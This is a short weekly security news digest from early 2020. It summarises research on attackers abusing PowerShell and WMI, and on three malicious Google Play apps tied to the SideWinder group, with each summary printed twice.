Malware Watch - W/E - 1/10/20
Attackers Turn Legitimate, Native Tools into Threat Mechanisms (12/27/2019)
Research on living-off-the-land tools, which are features and tools already present on native systems, shows that attackers were most focused on PowerShell, the Windows Management Instrumentation, and the WMI command line capabilities to download or copy payloads to target computers. Using these tools became prominent beginning in September. Symantec blocked more than 480,000 malicious PowerShell scripts on endpoints during that month.
Research on living-off-the-land tools, which are features and tools already present on native systems, shows that attackers were most focused on PowerShell, the Windows Management Instrumentation, and the WMI command line capabilities to download or copy payloads to target computers. Using these tools became prominent beginning in September. Symantec blocked more than 480,000 malicious PowerShell scripts on endpoints during that month.
Malicious Apps Found in Google Play Linked to SideWinder Threat Group (01/06/2020)
Trend Micro researchers found three malicious apps in Google Play that work together to compromise a victim's device and collect user information. The three apps were disguised as photography and file manager tools. One of these apps, called Camero, exploits a vulnerability that exists in Binder (the main Inter-Process Communication system in Android). The researchers believe that all three apps are likely to be part of the SideWinder threat actor group's arsenal. SideWinder, a group that has been active since 2012, is a known threat and has reportedly targeted military entities' Windows machines. The apps have since been pulled from Google Play.
Trend Micro researchers found three malicious apps in Google Play that work together to compromise a victim's device and collect user information. The three apps were disguised as photography and file manager tools. One of these apps, called Camero, exploits a vulnerability that exists in Binder (the main Inter-Process Communication system in Android). The researchers believe that all three apps are likely to be part of the SideWinder threat actor group's arsenal. SideWinder, a group that has been active since 2012, is a known threat and has reportedly targeted military entities' Windows machines. The apps have since been pulled from Google Play.